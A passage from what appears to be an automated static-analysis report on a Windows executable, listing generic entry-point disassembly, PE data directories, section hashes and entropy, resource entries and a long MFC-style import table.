                                                                                                                                                                                                            xor ecx, ebp
                                                                                                                                                                                                            call 00007FD7E15AAC99h
                                                                                                                                                                                                            jmp 00007FD7E15ABF2Fh
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                                            mov eax, dword ptr [006E4434h]
                                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                                            mov eax, dword ptr [006E4434h]
                                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2dea04 | 0x190 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x304000 | 0x2140b4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x419000 | 0x1ed0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2ac3f0 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x2ac4e8 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ac448 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x25e000 | 0xca0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x25c6a4 | 0x25c800 | f7c9731f8f6ac09a3dd3ad4f6983787c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x25e000 | 0x84dce | 0x84e00 | 0bede94238da379df5062e0ab65b4108 | False | 0.33674778045625586 | OpenPGP Public Key | 5.360758117639112 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x2e3000 | 0x20584 | 0x7e00 | d9f8dd1eedd356b03c4fa5235bc75dc5 | False | 0.25536334325396826 | data | 4.987820388148724 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x304000 | 0x2140b4 | 0x214200 | 2b6ce355c2e13d5b49032536c82763da | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
--- | --- | --- | --- | --- | --- | ---
AFX_DIALOG_LAYOUT | 0x3052c4 | 0x2a | data | English | United States | 0.35714285714285715
AFX_DIALOG_LAYOUT | 0x3052f0 | 0x2 | data | English | United States | 5.0
AFX_DIALOG_LAYOUT | 0x3052f4 | 0x2 | data | English | United States | 5.0
AFX_DIALOG_LAYOUT | 0x3052f8 | 0x2 | data | English | United States | 5.0
RT_CURSOR | 0x3052fc | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x305430 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_CURSOR | 0x3054e4 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365
RT_CURSOR | 0x305618 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715
RT_CURSOR | 0x30574c | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x305880 | 0x134 | data | English | United States | 0.37662337662337664
RT_CURSOR | 0x3059b4 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x305ae8 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664
RT_CURSOR | 0x305c1c | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x305d50 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x305e84 | 0x134 | data | English | United States | 0.44155844155844154
RT_CURSOR | 0x305fb8 | 0x134 | data | English | United States | 0.4155844155844156
RT_CURSOR | 0x3060ec | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922
RT_CURSOR | 0x306220 | 0x134 | data | English | United States | 0.2662337662337662
RT_CURSOR | 0x306354 | 0x134 | data | English | United States | 0.2824675324675325
RT_CURSOR | 0x306488 | 0x134 | data | English | United States | 0.3246753246753247
RT_BITMAP | 0x3065bc | 0x22d8 | Device independent bitmap graphic, 80 x 37 x 24, image size 8880, resolution 3780 x 3780 px/m | English | United States | 0.06143497757847534
RT_BITMAP | 0x308894 | 0x11a28 | Device independent bitmap graphic, 512 x 47 x 24, image size 72192 | English | United States | 0.12270184959574704
RT_BITMAP | 0x31a2bc | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0x31a374 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0x31a4b8 | 0x528 | Device independent bitmap graphic, 16 x 32 x 32, image size 1280 | English | United States | 0.33484848484848484
RT_ICON | 0x31a9e0 | 0x1428 | Device independent bitmap graphic, 32 x 64 x 32, image size 5120 | English | United States | 0.1682170542635659
RT_ICON | 0x31be08 | 0x2d28 | Device independent bitmap graphic, 48 x 96 x 32, image size 11520 | English | United States | 0.1139273356401384
RT_ICON | 0x31eb30 | 0x38e2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9945062491416015
RT_ICON | 0x322414 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.5484104046242775
RT_ICON | 0x32297c | 0x748 | Device independent bitmap graphic, 24 x 48 x 24, image size 0 | English | United States | 0.5187768240343348
RT_ICON | 0x3230c4 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 0 | English | United States | 0.4382716049382716
RT_ICON | 0x323d6c | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 0 | English | United States | 0.3436477644492912
RT_ICON | 0x325a14 | 0x3228 | Device independent bitmap graphic, 64 x 128 x 24, image size 0 | English | United States | 0.27920560747663553
RT_ICON | 0x328c3c | 0xc828 | Device independent bitmap graphic, 128 x 256 x 24, image size 0 | English | United States | 0.16272443403590944
RT_ICON | 0x335464 | 0x32028 | Device independent bitmap graphic, 256 x 512 x 24, image size 0 | English | United States | 0.08917691857059168
RT_ICON | 0x36748c | 0xc8028 | Device independent bitmap graphic, 512 x 1024 x 24, image size 0 | English | United States | 0.028426346369806163
RT_MENU | 0x42f4b4 | 0x196 | data | English | United States | 0.5295566502463054
RT_DIALOG | 0x42f64c | 0x19c | data | English | United States | 0.5728155339805825
RT_DIALOG | 0x42f7e8 | 0x14c0 | data | English | United States | 0.2321159638554217
RT_DIALOG | 0x430ca8 | 0x110 | data | English | United States | 0.6066176470588235
RT_DIALOG | 0x430db8 | 0x254 | data | English | United States | 0.48825503355704697
RT_DIALOG | 0x43100c | 0xe8 | data | English | United States | 0.6336206896551724
RT_DIALOG | 0x4310f4 | 0x34 | data | English | United States | 0.9038461538461539
RT_STRING | 0x431128 | 0xee | data | English | United States | 0.4327731092436975
RT_STRING | 0x431218 | 0x7c | Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0 | English | United States | 0.5806451612903226
RT_STRING | 0x431294 | 0x6a | data | English | United States | 0.7264150943396226
RT_STRING | 0x431300 | 0x192 | data | English | United States | 0.40298507462686567
RT_STRING | 0x431494 | 0x260 | data | English | United States | 0.0805921052631579
RT_STRING | 0x4316f4 | 0x228 | data | English | United States | 0.43478260869565216
RT_STRING | 0x43191c | 0x1b4 | data | English | United States | 0.3761467889908257
RT_STRING | 0x431ad0 | 0x86 | data | English | United States | 0.6567164179104478
RT_STRING | 0x431b58 | 0x82 | StarOffice Gallery theme p, 536899072 objects, 1st n | English | United States | 0.7153846153846154
RT_STRING | 0x431bdc | 0x2a | data | English | United States | 0.5476190476190477
RT_STRING | 0x431c08 | 0x184 | data | English | United States | 0.48711340206185566
RT_STRING | 0x431d8c | 0x4ee | data | English | United States | 0.375594294770206
RT_STRING | 0x43227c | 0x264 | data | English | United States | 0.3333333333333333
RT_STRING | 0x4324e0 | 0x2da | data | English | United States | 0.3698630136986301
RT_STRING | 0x4327bc | 0x8a | data | English | United States | 0.6594202898550725
RT_STRING | 0x432848 | 0xac | data | English | United States | 0.45348837209302323
RT_STRING | 0x4328f4 | 0xde | data | English | United States | 0.536036036036036
RT_STRING | 0x4329d4 | 0x4a8 | data | English | United States | 0.3221476510067114
RT_STRING | 0x432e7c | 0x228 | data | English | United States | 0.4003623188405797
RT_STRING | 0x4330a4 | 0x2c | data | English | United States | 0.5227272727272727
RT_STRING | 0x4330d0 | 0x53e | data | English | United States | 0.2965722801788376
RT_ACCELERATOR | 0x433610 | 0x28 | data | English | United States | 0.975
RT_GROUP_CURSOR | 0x433638 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States | 1.0294117647058822
RT_GROUP_CURSOR | 0x43365c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433670 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433684 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433698 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x4336ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x4336c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x4336d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x4336e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x4336fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433710 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433724 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433738 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x43374c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x433760 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x433774 | 0x3e | data | English | United States | 0.7903225806451613
RT_GROUP_ICON | 0x4337b4 | 0x76 | data | English | United States | 0.711864406779661
RT_VERSION | 0x43382c | 0x33c | data | English | United States | 0.4227053140096618
RT_DLGINCLUDE | 0x433b68 | 0x60236 | PC bitmap, Windows 3.x format, 49522 x 2 x 49, image size 393844, cbSize 393782, bits offset 54 |  |  | 0.7211172679299714
RT_ANIICON | 0x493da0 | 0xe160 | PC bitmap, Windows 3.x format, 7348 x 2 x 37, image size 58483, cbSize 57696, bits offset 54 |  |  | 0.3879645036051026
RT_ANIICON | 0x4a1f00 | 0x9659 | PC bitmap, Windows 3.x format, 5424 x 2 x 35, image size 38738, cbSize 38489, bits offset 54 |  |  | 0.37800410506898074
RT_ANIICON | 0x4ab55c | 0xb5db | PC bitmap, Windows 3.x format, 6682 x 2 x 54, image size 46685, cbSize 46555, bits offset 54 |  |  | 0.36421437009988183
RT_ANIICON | 0x4b6b38 | 0x32888 | PC bitmap, Windows 3.x format, 26553 x 2 x 44, image size 207353, cbSize 206984, bits offset 54 |  |  | 0.495371622927376
RT_ANIICON | 0x4e93c0 | 0x2e8bb | PC bitmap, Windows 3.x format, 24253 x 2 x 36, image size 190909, cbSize 190651, bits offset 54 |  |  | 0.4829085606684465
None | 0x517c7c | 0x437 | DOS executable (COM) | English | United States | 0.2632066728452271

DLL | Import
--- | ---
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
KERNEL32.dll | GetDateFormatW, GetStdHandle, ExitProcess, GetFileType, SetStdHandle, QueryPerformanceFrequency, HeapQueryInformation, GetTimeZoneInformation, VirtualQuery, GetSystemInfo, GetConsoleCP, GetCommandLineA, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, SetConsoleCtrlHandler, InterlockedFlushSList, InterlockedPushEntrySList, RtlUnwind, OutputDebugStringW, GetTimeFormatW, CompareStringW, LCMapStringW, IsValidLocale, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetStringTypeW, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetEnvironmentStringsW, InitializeSListHead, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetStartupInfoW, IsDebuggerPresent, CreateEventW, WaitForSingleObjectEx, ResetEvent, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, LocalUnlock, EnumSystemLocalesW, LocalLock, SearchPathA, GetProfileIntA, GetTickCount, GetTempPathA, VerifyVersionInfoA, VerSetConditionMask, GetWindowsDirectoryA, FindResourceExW, lstrcpyA, SetErrorMode, SystemTimeToTzSpecificLocalTime, SetFileAttributesA, LocalFileTimeToFileTime, GetFileSizeEx, GetFileAttributesExA, FileTimeToLocalFileTime, GetCurrentDirectoryA, GetACP, GetCPInfo, GetOEMCP, VirtualProtect, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, GlobalFlags, FileTimeToSystemTime, GetAtomNameA, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, GetStringTypeExA, GetThreadLocale, GetVolumeInformationA, MoveFileA, lstrcmpiA, GetShortPathNameA, LoadLibraryExA, DuplicateHandle, UnlockFile, SetEndOfFile, LockFile, GetFileSize, FlushFileBuffers, FindFirstFileA, FindClose, DeleteFileA, GetUserDefaultLCID, SystemTimeToFileTime, ReplaceFileA, GetTempFileNameA, SetFileTime, GetFullPathNameA, GetFileTime, GetFileAttributesA, GetCurrentProcessId, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, lstrcmpA, GetVersionExA, GetCurrentThread, SuspendThread, SetThreadPriority, SetEvent, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, lstrcmpW, GlobalDeleteAtom, LoadLibraryW, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeResource, GetSystemDirectoryW, GetCurrentThreadId, EncodePointer, OutputDebugStringA, CopyFileA, MulDiv, LocalFree, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, GetModuleHandleA, GetModuleFileNameA, MultiByteToWideChar, ResumeThread, LeaveCriticalSection, EnterCriticalSection, GetLogicalDrives, GetDiskFreeSpaceA, VirtualFree, VirtualAlloc, CreateEventA, GetOverlappedResult, WriteFile, SetFilePointer, ReadFile, CreateFileA, WideCharToMultiByte, FindResourceW, SizeofResource, LockResource, LoadResource, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, RaiseException, DecodePointer, FormatMessageA, LoadLibraryA, GetProcAddress, FreeLibrary, GetCurrentProcess, Sleep, WaitForSingleObject, SetLastError, CloseHandle, WriteConsoleW, QueryDosDeviceA, GetLastError, FreeEnvironmentStringsW, SetEnvironmentVariableW, CreateFileW, GetCommandLineW
USER32.dll | GetMenuBarInfo, LoadImageA, DestroyIcon, InsertMenuItemA, CreatePopupMenu, LoadMenuA, TranslateAcceleratorA, LoadAcceleratorsA, BringWindowToTop, WindowFromPoint, WaitMessage, LoadCursorW, IsRectEmpty, SetWindowRgn, DrawIcon, KillTimer, SetTimer, ReleaseCapture, SetCapture, OffsetRect, SystemParametersInfoA, InflateRect, GetMenuItemInfoA, DestroyMenu, CharUpperA, SetRectEmpty, ClientToScreen, GetWindowDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, GetWindowThreadProcessId, ShowOwnedPopups, GetCursorPos, GetMessageA, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SendDlgItemMessageA, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetDlgItemTextA, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExA, GetWindow, GetLastActivePopup, GetTopWindow, UnpackDDElParam, GetClassLongA, GetWindowLongA, PtInRect, EqualRect, CopyRect, GetSysColor, MapWindowPoints, ScreenToClient, MessageBoxA, AdjustWindowRectEx, GetClientRect, GetWindowTextLengthA, GetWindowTextA, RemovePropA, SetLayeredWindowAttributes, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, SetFocus, GetDlgCtrlID, GetDlgItem, IsIconic, IsWindowVisible, EnumDisplayMonitors, SetClassLongA, OpenClipboard, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, UnregisterClassA, EnableWindow, TranslateMessage, DispatchMessageA, PeekMessageA, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsMenu, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, ReuseDDElParam, GetSysColorBrush, RealChildWindowFromPoint, CopyImage, GetAsyncKeyState, MapDialogRect, GetDialogBaseUnits, DeleteMenu, LoadAcceleratorsW, LoadMenuW, LoadImageW, GetKeyNameTextA, MapVirtualKeyA, UnionRect, LoadBitmapW, SetMenuItemInfoA, SetParent, GetMenuDefaultItem, GetNextDlgGroupItem, DrawFocusRect, DrawIconEx, GetIconInfo, MessageBeep, EnableScrollBar, HideCaret, InvertRect, GetClassNameA, SendMessageA, PostMessageA, GetSystemMetrics, DrawMenuBar, GetSystemMenu, EnableMenuItem, UpdateWindow, GetDC, ReleaseDC, InvalidateRect, GetWindowRect, FillRect, IntersectRect, GetParent, TrackMouseEvent, SetCursor, SetWindowLongA, LoadCursorA, DestroyCursor, CopyIcon, PostQuitMessage, GetMenuStringA, GetMenuState, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuA, AppendMenuA, RemoveMenu, GetFocus, CheckMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, NotifyWinEvent, GetTabbedTextExtentW, GetTabbedTextExtentA, GetWindowRgn, WindowFromDC, CreateMenu, InSendMessage, MonitorFromRect, SendNotifyMessageA, SubtractRect, TranslateMDISysAccel, DefMDIChildProcA, DefFrameProcA, EnumChildWindows, GetUpdateRect, IsClipboardFormatAvailable, CharUpperBuffA, RegisterClipboardFormatA, ModifyMenuA, GetDoubleClickTime, SetMenuDefaultItem, CopyAcceleratorTableA, DestroyAcceleratorTable, CreateAcceleratorTableA, ToAsciiEx, GetKeyboardState, MapVirtualKeyExA, IsCharLowerA, GetKeyboardLayout, PostThreadMessageA, GetComboBoxInfo, MonitorFromPoint, UpdateLayeredWindow, LockWindowUpdate, GetDCEx, SetRect, FrameRect, SetCursorPos, IsZoomed, DrawFrameControl, GetPropA, DrawEdge
GDI32.dll | GetClipBox, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectPalette, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextAlign, SetTextJustification, PlayMetaFileRecord, EnumMetaFile, SetWorldTransform, ModifyWorldTransform, SetColorAdjustment, StartDocA, ArcTo, PolyDraw, SelectClipPath, SetArcDirection, ExtCreatePen, MoveToEx, TextOutA, ExtTextOutA, PolyBezierTo, PolylineTo, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectA, GetTextExtentPoint32A, CreateEllipticRgn, Ellipse, ExcludeClipRect, DPtoLP, LPtoDP, GetTextMetricsA, CombineRgn, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, CreateFontA, GetCharWidthA, StretchDIBits, EnumFontFamiliesExA, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, GetBkColor, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, SetDIBColorTable, GetTextColor, CreatePolygonRgn, Polygon, Polyline, CreateRoundRectRgn, GetRgnBox, OffsetRgn, GetCurrentObject, RoundRect, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, ExtFloodFill, SetPaletteEntries, SetPixelV, GetWindowOrgEx, GetViewportOrgEx, CloseMetaFile, CreateMetaFileA, DeleteMetaFile, EndDoc, StartPage, EndPage, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, GetTextExtentPointA, GetTextExtentPoint32W, GetTextFaceA,
Escape, CreateRectRgn, CreateSolidBrush, CreatePatternBrush, CreateHatchBrush, CreateDIBPatternBrushPt, SetTextColor, SetBkColor, CreateBitmap, GetDeviceCaps, CopyMetaFileA, GetObjectA, SelectObject, Rectangle, DeleteDC, CreatePen, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateDIBSection, DeleteObject, BitBlt
                                                                                                                                                                                                            MSIMG32.dllAlphaBlend, TransparentBlt
                                                                                                                                                                                                            COMDLG32.dllGetSaveFileNameA, CommDlgExtendedError
                                                                                                                                                                                                            WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter, GetJobA
                                                                                                                                                                                                            ADVAPI32.dllRegEnumKeyA, RegSetValueA, RegEnumKeyExA, RegEnumValueA, RegOpenKeyExW, GetFileSecurityA, SetFileSecurityA, RegQueryValueA, RegCloseKey, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegOpenKeyExA
                                                                                                                                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, ShellExecuteA, DragQueryFileA, DragFinish, SHAddToRecentDocs, ExtractIconA, SHGetSpecialFolderLocation, SHGetDesktopFolder, SHGetMalloc, SHAppBarMessage, ShellExecuteExA, SHGetFileInfoA
                                                                                                                                                                                                            COMCTL32.dllInitCommonControlsEx
                                                                                                                                                                                                            SHLWAPI.dllPathFindExtensionA, PathFindExtensionW, PathIsUNCServerShareA, PathFindFileNameA, PathFileExistsA, PathIsUNCA, PathStripToRootA, StrFormatKBSizeA, PathRemoveFileSpecW, PathRemoveExtensionA
                                                                                                                                                                                                            UxTheme.dllOpenThemeData, DrawThemeParentBackground, CloseThemeData, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, GetWindowTheme, IsAppThemed, GetThemePartSize, GetCurrentThemeName, DrawThemeText, DrawThemeBackground, GetThemeColor
                                                                                                                                                                                                            ole32.dllOleIsCurrentClipboard, DoDragDrop, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, OleSetMenuDescriptor, OleLockRunning, StgCreateDocfile, StgOpenStorage, StgOpenStorageOnILockBytes, StgIsStorageFile, CreateILockBytesOnHGlobal, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleRegGetMiscStatus, OleRegEnumVerbs, StgCreateDocfileOnILockBytes, WriteClassStm, GetHGlobalFromILockBytes, CreateGenericComposite, CreateItemMoniker, OleCreate, OleCreateFromData, OleCreateLinkFromData, OleFlushClipboard, OleSetClipboard, CreateStreamOnHGlobal, CLSIDFromString, CoDisconnectObject, StringFromGUID2, PropVariantCopy, CoInitialize, CoCreateInstance, OleCreateStaticFromData, OleCreateLinkToFile, CoGetMalloc, OleQueryLinkFromData, CoCreateGuid, CoUninitialize, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, CreateBindCtx, CoTreatAsClass, WriteClassStg, ReadClassStg, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoInitializeEx, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, OleRun, CreateDataAdviseHolder, CreateOleAdviseHolder, GetRunningObjectTable, OleIsRunning, OleQueryCreateFromData, CLSIDFromProgID, CoRegisterMessageFilter, CoRevokeClassObject, CoRegisterClassObject, CoGetClassObject, OleUninitialize, OleInitialize, CoFreeUnusedLibraries
                                                                                                                                                                                                            OLEAUT32.dllRegisterTypeLib, SysStringLen, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SafeArrayCreate, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SysAllocStringLen, LoadRegTypeLib, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, SysAllocString, SysAllocStringByteLen, LoadTypeLib, VariantChangeType, VariantClear, SafeArrayLock, VariantInit, SafeArrayGetLBound, SysFreeString, SysStringByteLen
